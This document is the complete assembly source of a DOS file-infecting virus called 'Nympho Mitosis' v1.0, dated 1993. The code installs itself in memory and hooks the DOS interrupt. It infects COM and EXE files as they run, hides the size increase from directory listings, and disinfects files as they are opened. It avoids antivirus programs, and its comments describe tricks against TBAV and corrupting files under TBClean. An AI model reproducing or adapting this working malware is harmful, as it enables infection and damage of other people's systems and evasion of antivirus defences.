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.model tiny ;_ASSUME CS=DS=ES=SS
.code ;/
org 100h ;Origin @ 100h (COM File)
start: ;Marks Start of Source
v_start: ;Marks Start of Virus
mov bp,000h ;<Ŀ Constantly ;** Get Rid of TBAV's
delta equ $-002h ;<<3C><> Changing ;** Flexible Entry Point
push ds es ;Save Segments onto Stack
mov ax,5D3Dh ;AX=5D3Dh / CHECKRESIDENT
int 021h ;DOS Services
cmp ax,003Dh ;Is the Virus Resident?
je restoreCOMEXEfile ;Jump if Equal/Zero
cwd ;Load Register w/Zero
mov ds,dx ;DS=>Starting of INT Table
xchg di,dx ;Load Register w/Zero
lds ax,dword ptr ds:[084h] ;Load Far Pointer to DS:AX
mov word ptr cs:[bp+Int21hOffset],ax ;Save Interrupt Offset
mov word ptr cs:[bp+Int21hSegment],ds ;Save Interrupt Segment
mov ax,es ;ES=PSP=AX
dec ax ;Decrement for Last MCB
mov ds,ax ;AX=Last MCB=DS
cmp byte ptr ds:[di+000h],05Ah ;Is MCB Last in Chain?
jne restoreCOMEXEfile ;Jump if Not Equal/Zero
mov byte ptr ds:[di+000h],04Dh ;Mark MCB as NOT Last
sub word ptr ds:[di+003h],(heap_end-v_start+100h+015d)/016d+001h
sub word ptr ds:[di+012h],(heap_end-v_start+100h+015d)/016d+001h
mov ax,word ptr ds:[di+012h] ;AX=Location of Virus MCB
mov ds,ax ;DS=Location of Virus MCB
inc ax ;Increment for Mem Loc
mov es,ax ;AX=Memory Location=ES
mov byte ptr ds:[di+000h],05Ah ;Mark MCB as Last in Chain
mov word ptr ds:[di+001h],008h ;Mark DOS as Owner of MCB
mov word ptr ds:[di+003h],(heap_end-v_start+100h+015d)/016d
push cs ;Push Segment onto Stack
pop ds ;Restore into DS (CS=DS)
cld ;Clear Direction Flag
mov di,100h ;DI=Location in Memory
lea si,[bp+v_start] ;SI=Source of Data
mov cx,(heap_end-v_start)/002h ;CX=Number of Bytes
rep movsw ;Word @ DS:[SI]=>ES:[DI]
mov ds,cx ;CX=000h=DS=Int Table
cli ;Turn OFF Interrupts
mov word ptr ds:[084h],offset Int21Handler
mov word ptr ds:[086h],es ;Location in Memory
sti ;Turn ON Interrupts
restoreCOMEXEfile: ;
pop es ds ;Restore Segments
mov ax,5A4Dh ;AX=5A4Dh (MZ)
lea si,cs:[bp+host_bytes] ;SI=Host_Bytes
cmp ax,word ptr cs:[si+000h] ;Is an EXE Our Host?
je restoreEXEfile ;Jump if Equal/Zero
xchg ah,al ;Exchange Registers (ZM)
cmp ax,word ptr cs:[si+000h] ;Is an EXE Our Host?
je restoreEXEfile ;Jump if Equal/Zero
restoreCOMfile: ;
mov di,0FFh ;DI=Location in Memory
inc di ;Increment for Real Loc
push di ;Push DI onto Stack
mov byte ptr [di],0C3h ;** Here, we screw up
;** the file _if_ TBClean
call di ;** is being run.
;** Thanks LM!
movsw ;Word @ DS:[SI]=>ES:[DI]
movsb ;Byte @ DS:[SI]=>ES:[DI]
retn ;Return to Host Program
restoreEXEfile: ;
mov ax,es ;ES=PSP=AX
add ax,010h ;Skip One Segment for CS
add ax,word ptr cs:[si+016h] ;Calculate Start of Prog
push ax ;Push New CS to Stack
push word ptr cs:[si+014h] ;Push IP to Stack
retf ;Return to Host Program
db "[Nympho Mitosis] v1.0",000h ;Le Nom du Virus
db "Copyright (c) 1993 Memory Lapse",000h
Int21Handler: ;
cmp ax,5D3Dh ;Is Virus Checking?
jne check_execute ;Jump if Not Equal/Zero
cbw ;Convert AL to AX
iret ;Interrupt Return
check_execute: ;
cmp ah,011h ;Are We Doing a DIR?
je _FCBStealth ;Jump if Equal/Zero
; (DOS)
cmp ah,012h ;Are We Doing a DIR?
je _FCBStealth ;Jump if Equal/Zero
; (DOS)
cmp ah,04Eh ;Are We Doing a DIR?
je _DTAStealth ;Jump if Equal/Zero
; (4DOS)
cmp ah,04Fh ;Are We Doing a DIR?
je _DTAStealth ;Jump if Equal/Zero
; (4DOS)
push ax bx cx dx di si ds es ;Push Registers onto Stack
cmp ax,6C00h ;Are We Extended Opening?
je __disinfectCOMEXEfile ;Jump if Equal/Zero
cmp ah,03Dh ;Are We Opening?
je _disinfectCOMEXEfile ;Jump if Equal/Zero
dec ax ;** Get Rid of TBAV's
;** Traps Loading of SW.
cmp ax,4AFFh ;Are We Executing?
je _infectCOMEXEfile ;Jump if Equal/Zero
_Interrupt21h: ;
pop es ds si di dx cx bx ax ;Restore Registers
Interrupt21h: ;
db 0EAh,000h,000h,000h,000h ;JMP FAR PTR SSSS:OOOO
Int21hOffset equ $-004h ;Buffer for Int 21 Offset
Int21hSegment equ $-002h ;Buffer for Int 21 Segment
_FCBStealth: ;
jmp FCBStealth ;Unconditional Jump
_DTAStealth: ;
jmp DTAStealth ;Unconditional Jump
_infectCOMEXEfile: ;
jmp infectCOMEXEfile ;Unconditional Jump
__disinfectCOMEXEfile: ;
xchg dx,si ;SI=File Name=>DX
_disinfectCOMEXEfile: ;
jmp disinfectCOMEXEfile ;Unconditional Jump
FCBStealth: ;
pushf ;Push Flags to Top of Stck
push cs ;Push Segment onto Stack
call Interrupt21h ;Simulate Interrupt
test al,al ;Was There an Error?
jnz endFCBstealth ;Jump if Not Equal/Zero
push es dx cx bx ax ;Push Registers onto Stack
mov ah,051h ;AH=51h / GET PSP ADDRESS
int 021h ;DOS Services
mov es,bx ;BX=Address=ES
cmp bx,word ptr es:[016h] ;Is This a Parent PSP?
jne restoreFCBregisters ;Jump if Not Equal/Zero
mov bx,dx ;DX=BX
mov al,[bx] ;Get First Byte of FCB
push ax ;Save Byte onto Stack
mov ah,02Fh ;AH=2Fh / GET DTA ADDRESS
int 021h ;DOS Services
pop ax ;Restore AX
inc al ;Is This an Extended FCB?
jnz checkFCBinfected ;Jump if Not Equal/Zero
add bx,007h ;Convert to Normal FCB
checkFCBinfected: ;
mov cx,word ptr es:[bx+017h] ;CX=Time
mov dx,word ptr es:[bx+019h] ;DX=Date
and cx,01Fh ;Unmask Seconds Field
and dx,01Fh ;Unmask Day Field
xor cx,dx ;Are They the Same?
jnz restoreFCBregisters ;Jump if Not Equal/Zero
sub word ptr es:[bx+01Dh],(v_end-v_start);Subtract Virus Length
sbb word ptr es:[bx+01Fh],000h ;Subtract if Borrow
restoreFCBregisters: ;
pop ax bx cx dx es ;Restore Registers
endFCBstealth: ;
iret ;Interrupt Return
DTAStealth: ;
pushf ;Push Flags to Top of Stck
push cs ;Push Segment onto Stack
call Interrupt21h ;Simulate Interrupt
jc endDTAstealth ;Jump if Carry Flag Set
push es dx cx bx ax ;Save Registers onto Stack
mov ah,02Fh ;AH=2Fh / GET PSP ADDRESS
int 021h ;DOS Services
mov cx,word ptr es:[bx+016h] ;CX=Time
mov dx,word ptr es:[bx+018h] ;DX=Date
and cx,01Fh ;Unmask Seconds Field
and dx,01Fh ;Unmask Day Field
xor cx,dx ;Are They the Same?
jnz restoreDTAregisters ;Jump if Not Equal/Zero
sub word ptr es:[bx+01Ah],(v_end-v_start);Subtract Virus Size
sbb word ptr es:[bx+01Ch],000h ;Subtract if Borrow
restoreDTAregisters: ;
pop ax bx cx dx es ;Restore Registers
endDTAstealth: ;
retf 002h ;Return Far (POP 2 WORDS)
disinfectCOMEXEfile: ;
call OpenAndGetSFT ;Call Procedure
mov cx,word ptr es:[di+00Dh] ;CX=Time
mov dx,word ptr es:[di+00Fh] ;DX=Date
and cx,01Fh ;Unmask Seconds Field
and dx,01Fh ;Unmask Day Field
xor cx,dx ;Are They the Same?
jnz disinfect_close ;Jump if Not Equal/Zero
call LSeek ;Move File Pointer to End
xchg cx,dx ;Exchange Register Values
xchg dx,ax ;Exchange Register Values
push dx cx ;Save File Size to Stack
sub dx,018h ;Subtract 18 for Host_Byte
sbb cx,000h ;Subtract if Borrow
mov word ptr es:[di+015h],dx ;Move File Pointer to
mov word ptr es:[di+017h],cx ;Starting of Host_Bytes
mov dx,offset temp_buffer ;DX=Buffer for Data
mov cx,018h ;CX=Number of Bytes
mov ah,03Fh ;AH=3Fh / READ
int 021h ;DOS Services
mov word ptr es:[di+015h],000h ;Move File Pointer to
mov word ptr es:[di+017h],000h ;Starting of File (SFT)
mov ah,040h ;AH=40h / WRITE
int 021h ;DOS Services
pop cx dx ;Restore File Size
sub dx,(v_end-v_start) ;Subtract Virus Size
sbb cx,000h ;Subtract if Borrow
mov word ptr es:[di+015h],dx ;Move File Pointer to
mov word ptr es:[di+017h],cx ;Starting of Virus
sub cx,cx ;Load Register w/Zero
mov ah,040h ;AH=40h / WRITE
int 021h ;DOS Services
mov cx,word ptr es:[di+00Dh] ;CX=Time
and cl,0E0h ;Unmask Seconds Field
or cl,008h ;Set Seconds to 016d
mov dx,word ptr es:[di+00Fh] ;DX=Date
jmp preCLOSECOMEXEfile ;Unconditional Jump
disinfect_close: ;
jmp closeCOMEXEfile ;Unconditional Jump
infectCOMEXEfile: ;
call OpenAndGetSFT ;Call Procedure
mov cx,word ptr es:[di+00Dh] ;CX=Time
mov dx,word ptr es:[di+00Fh] ;DX=Date
and cx,01Fh ;Unmask Seconds Field
and dx,01Fh ;Unmask Day Field
xor cx,dx ;Are They the Same?
jz _closeCOMEXEfile ;Jump if Equal/Zero
cmp word ptr es:[di+020h],'BT' ;Could It Be ThunderByte?
je _closeCOMEXEfile ;Jump if Equal/Zero
cmp word ptr es:[di+020h],'-F' ;Could it Be F-Prot?
je _closeCOMEXEfile ;Jump if Equal/Zero
cmp word ptr es:[di+020h],'CS' ;Could it Be ViruScan?
je _closeCOMEXEfile ;Jump if Equal/Zero
cmp word ptr es:[di+020h],'LC' ;Could it Be Clean?
je _closeCOMEXEfile ;Jump if Equal/Zero
mov dx,offset host_bytes ;DX=Buffer for Data
mov cx,018h ;CX=Number of Bytes
mov ah,03Fh ;AH=3Fh / READ
int 021h ;DOS Services
mov word ptr es:[di+015h],000h ;Move File Pointer to
mov word ptr es:[di+017h],000h ;Starting of File (SFT)
mov si,offset temp_buffer ;SI=Temp_buffer
mov ax,4D5Ah ;** Get Rid of TBAV's
;** EXE/COM Determination
cmp ax,word ptr [host_bytes+000h] ;Is This an EXE File?
je infectEXEfile ;Jump if Equal/Zero
xchg ah,al ;Exchange Registers (MZ)
cmp ax,word ptr [host_bytes+000h] ;Is This an EXE File?
je infectEXEfile ;Jump if Equal/Zero
infectCOMfile: ;
call LSeek ;Move File Pointer to End
mov word ptr [delta],ax ;Write New Delta Offset
sub ax,003h ;Subtract 03 for JMP Loc
mov byte ptr [si+000h],0E9h ;Write JMP to Buffer
mov word ptr [si+001h],ax ;Write JMP Loc to Buffer
mov cx,003h ;CX=Number of Bytes
push cx ;Push Register onto Stack
jmp continueCOMEXEinfect ;Unconditional Jump
_closeCOMEXEfile: ;
jmp closeCOMEXEfile ;Unconditional Jump
infectEXEfile: ;
mov dx,si ;DX=Buffer for Data
push cx ;CX=Number of Bytes
mov ah,03Fh ;AH=3Fh / READ
int 021h ;DOS Services
call LSeek ;Move File Pointer to End
push dx ax ;Push File Size onto Stack
add ax,(v_end-v_start) ;Add Virus Size to Low Bit
adc dx,000h ;Add if Carry to High Bit
mov cx,200h ;CX=Number to Divide By
div cx ;Divide AX by CX
or dx,dx ;Do We Need to Round Up?
je no_burp ;Jump if Equal/Zero
inc ax ;Increment AX
no_burp: ;
mov word ptr [si+004h],ax ;New Length of File <20> 512
mov word ptr [si+002h],dx ;New # of Bytes in Last Pg
pop ax dx ;Restore File Size
mov cx,010h ;CX=Number to Divide By
div cx ;Divide AX by CX
sub ax,word ptr [si+008h] ;Subtact Header Size
mov word ptr [si+016h],ax ;CS=Segment of Virus
mov word ptr [si+014h],dx ;IP=Location of Virus
sub dx,100h ;Subtract 100h for Offset
mov word ptr [delta],dx ;Write New Delta Offset
continueCOMEXEinfect: ;
mov dx,offset v_start ;DX=Location of Data
mov cx,(v_end-v_start) ;CX=Number of Bytes
mov ah,040h ;AH=40h / WRITE
int 021h ;DOS Services
mov word ptr es:[di+015h],000h ;Move File Pointer to
mov word ptr es:[di+017h],000h ;Starting of File (SFT)
xchg dx,si ;DX=Location of Data
pop cx ;CX=Number of Bytes
mov ah,040h ;AH=40h / WRITE
int 021h ;DOS Services
mov cx,word ptr es:[di+00Dh] ;CX=Time
mov dx,word ptr es:[di+00Fh] ;DX=Date
push dx ;Push Date Stamp to Stack
and cx,-020h ;Reset Seconds
and dx,01Fh ;Unmask Day Field
or cx,dx ;Move Day into Seconds
pop dx ;Restore Date
mov ax,5701h ;AX=5701h / SET T/D STAMPS
int 021h ;DOS Services
closeCOMEXEfile: ;
mov ah,03Eh ;AH=3Eh / CLOSE File
int 021h ;DOS Services
jmp _Interrupt21h ;Unconditional Jump
OpenAndGetSFT: ;
mov ax,3D00h ;AX=3D00h / OPEN R/O
pushf ;Push Flags to Top of Stck
push cs ;Push Segment to Stack
call Interrupt21h ;Simulate Interrupt
xchg ax,bx ;Move File Handle to BX
push bx cs cs ;Push Registers to Stack
pop es ds ;Equal Out Segments
mov ax,1220h ;AX=1220h / GET JFT
int 02Fh ;Multiplex Interrupt
mov ax,1216h ;AX=1216h / GET SFT
mov bl,byte ptr es:[di] ;Move Byte into BL
int 02Fh ;Multiplex Interrupt
pop bx ;Restore File Handle
mov word ptr es:[di+002h],002h ;Open in Read/Write Mode
retn ;Return to Point of Call
LSeek: push ds ;Push Segment onto Stack
lds ax,dword ptr es:[di+011h] ;Load Far Pointer to DS:AX
mov word ptr es:[di+015h],ax ;Move File Pointer to
mov word ptr es:[di+017h],ds ;End of File. (SFT)
mov dx,ds ;Move High Bit to DX
pop ds ;Restore Segment to DS
retn ;Return to Point of Call
host_bytes dw 020CDh ;First 3 for COM ;Marks Host as an EXE
dw 002h ;# of Bytes @ Last Page
dw 004h ;# of Pages + Header Size
dw 006h ;# of Relocatable Entries
dw 008h ;Size of Header (Paras)
dw 00Ah ;Min. Memory Required
dw 00Ch ;Max. Memory Wanted
dw 00Eh ;SS Value at Entry
dw 010h ;SP Value at Entry
dw 012h ;Negative Checksum
dw 014h ;IP Value at Entry
dw 016h ;CS Value at Entry
v_end: ;Marks End of Virus
heap_start: ;Marks Start of Heap
temp_buffer db 018h dup (?) ;Multipurpose Buffer
heap_end: ;Marks End of Heap
end start ;Marks End of Source